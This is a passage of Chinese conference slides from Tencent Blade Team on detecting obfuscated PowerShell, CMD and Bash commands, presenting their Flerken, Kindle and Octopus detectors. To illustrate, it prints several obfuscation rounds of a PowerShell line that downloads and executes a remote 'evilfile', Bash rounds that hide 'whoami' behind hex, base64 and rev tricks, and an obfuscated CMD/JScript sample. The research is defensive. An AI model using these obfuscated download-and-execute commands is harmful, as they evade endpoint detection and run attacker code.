1、持續(xù)滲透中的高級命令混淆對抗Tencent Blade Team多次受邀參加海內(nèi)外頂級安全會議受邀參加Blackhat USA、DEFCON、 HITB、CanSecWest、CSS、XCon、 KCon等多個海內(nèi)外頂級安全會議獲Amazon、小米、華為等多 個品牌官方認可Amazon、小米、華為等多個品牌官方認 可，獲小米安全年度最佳守護者，榮獲華 為漏洞獎勵計劃官方認可輸出全行業(yè) 泛安全影響力為騰訊Tday、騰訊首屆技術文化周等活 勱輸出泛安全影響力谷歌TensorFlow成功發(fā)現(xiàn)首個TensorFlow框架自身安全漏洞， 并包攬TF已知前七個漏洞發(fā)現(xiàn)SQLite嚴重漏洞成功發(fā)現(xiàn)SQLit

2、e存在嚴重漏洞，影響 Chromium瀏覽器和大量Android、iOS應用深耕IoT領域成功破解Amazon Echo、Google Home、小米智能音箱等IoT設備目錄1.問題背景：命令混淆命令混淆方法我們的解決方案總結與討論1.問題背景：命令混淆1.1 什么是混淆？1.2 命令混淆范疇：特指操作系統(tǒng)原生的三個命令行程序PS/CMD.exe/Bash對象：命令行（Command Line）常規(guī)命令方法：基于上述三種命令行程序靈活的語法進行變形目標：繞過目標防御設備、端點保護系統(tǒng)、殺軟的惡意命令檢測1.3 攻擊路徑示例Windows篇通過漏洞進入，如 永恒之藍目標主機使用PS/CMD遠控服

3、務器將混淆命 令下載至 內(nèi)存內(nèi)存中利用將混淆命令 放入內(nèi)存IDS/EDR/殺軟繞過1.4 攻擊路徑示例Linux篇目標主機掃描滲透遠控服務器使用Bash繞過直接執(zhí)行 混淆命令下載混淆命令并執(zhí)行企業(yè)內(nèi)網(wǎng)IDS/EDR通過漏洞組件進入，如WebLogic2.命令混淆方法2.1簡單的PowerShell混淆Round 1Invoke-Expression (New-Object System.Net.WebClient).DownloadString(/evilfile)Round 2Invoke-Expression (New-Object Net.WebClient).(DownloadStri

4、ng).Invoke(h+ttp:/evilfile)Round 3invoke-exPressioN (+Ne+w+-+ObjectS)+(y+ste)+(m+.Net)+(.+WebCl)+ie+nt+()+.Dow)+(nlo+a)+dS+(tri+n)+(g(C+82h)+(t+tp:)+/+/1+(27+.0.)+(0.+1/ev+i)+(lfi+l+eC82).rEPlACE(C+82),StriNgCHaR34)2.2簡單的Bash混淆Round 1whoamiRound 3echo $x77ho$u0000ami | bashRound 5echo $x77ho$u0000am

5、i | $(echo $(echo aHMK|base64 -d)ab| rev)Round 2echo whoami | bashRound 4echo $x77ho$u0000ami | $(echo hsab| rev)2.3命令混淆工具CMD命令混淆工具：Invoke-DOSfuscationPowershell命令混淆工具：Invoke-Obfuscation、PS_obfsBash命令混淆工具：Bashfuscator、bashfuck2.4混淆樣本示例APT組織FIN 7中的混淆樣本PowerShell無文件木馬混淆Bashfuscator 工具生成的混 淆命令3.我們的解決方案

6、3.1新攻擊向量帶來的攻守失衡新型混淆工具的開源讓 混淆變得輕而易舉開源PS/CMD/Bash混淆工具眾多檢測方法寥寥無幾，誤報很多， 特別針對Linux混淆，業(yè)界尚無已知解決方法企業(yè)大規(guī)模服務器命令數(shù)據(jù) 加劇命令混淆檢測難度防御方案的不足進一步引起攻守的失衡3.2提出解決方法Flerken：從一石二鳥到雙塔奇兵出發(fā)點：是否存在統(tǒng)一的混淆檢測方案？NO語法特征差異性統(tǒng)計特征差異性數(shù)據(jù)規(guī)模差異性大小寫敏感性特殊字符使用 , / , 等區(qū)別命令長短引起的統(tǒng)計 特征差異性Windows服務器規(guī) 模遠小于Linux服務 器，加劇了訓練數(shù) 據(jù)的不平衡性多特征維度深入分析底層原因Windows (CMD/

7、Powershell) vs Linux (Bash)解決思路KindleOctopusLinux命令混淆檢測方法Windows命令混淆檢測方法3.3Kindle：基于可讀性的Windows混淆檢測Windows (CMD/Powershell)混淆與常規(guī)業(yè)務命令隨機抽樣對比常人（Human）可以有效識別混淆/非混淆命令核心觀察根本問題：影響這一判斷的本質(zhì)特征是什么？可讀性程度單詞可讀性符號可讀性整體長度大寫字母比例元音比例首字母大寫字母重復非混淆命令常見字符其他常規(guī)統(tǒng)計特征符號比例空格比例結合語言學統(tǒng)計分析的研究洞察完成單詞可讀性設計kindle07kindlemysqlkindllleki

8、nDlekindleisanextremelypopulartool3.3Kindle：基于可讀性的Windows混淆檢測線性判斷邏輯，增加告警可解釋性invoke-exPressioN (+Ne+w+-+ObjectS)+(y+ste)+(m+.Net)+(.+WebCl)+ie+nt+()+.Dow)+(nlo+a)+dS+(tri+n)+(g(C+82h)+(t+tp:)+/+/1+(27+.0.)+(0.+1/ev+i)+(lfi+l+eC82).rEPlACE(C+82),StriNgCHaR34)set w=wscript /b /e:jscript %HOMEPATH%tt.tx

9、t echo tryvar fs=new ActiveXObject(Scripting.FileSystemObject);sh=new ActiveXObject(Wscript.Shell);p=sh.ExpandEnvironmentStrings(%HOM+EP ATH%)+pp.txt;var f=fs.OpenTextFile(p,1,false);for(i=0;i%HOMEPATH%tt.txt copy /y %TMP%unlock.cmd %HOMEPATH%pp.txtecho %w:=%|cmd不可讀單詞比例符號比例不可讀單詞比例 不可讀符號比例線性判斷邏輯，增加告警

10、可解釋性分類器學習3.3Kindle：基于可讀性的Windows混淆檢測特征向量化3.4Octopus：基于靜態(tài)分析的Bash混淆識別混淆類型的研究多種混淆描述類型Linux混淆變形更為豐富，但依然可用有限的語法模 式表達，表達效果取決于 模式描述的泛化程度核心思路3.4Octopus：勱態(tài)語法解析下的Bash混淆識別關鍵挑戰(zhàn)：能否讓語法解析 沙箱只解析，不執(zhí)行？YES3.4Octopus bash對近10萬行Bash源碼進行深入分析，標記關鍵執(zhí)行凼數(shù)，并在最外層進行“去執(zhí)行化”編譯得到的Bash，稱之為Octopus bash， 可以還原混淆命令進一步結合文本相似性算法Simhash，實現(xiàn) 對于Bash命令混淆的高效識別3.5Flerken DemoFlerken demo：GitHub link: /We5ter/Flerken4.總結與討論4.1總結與討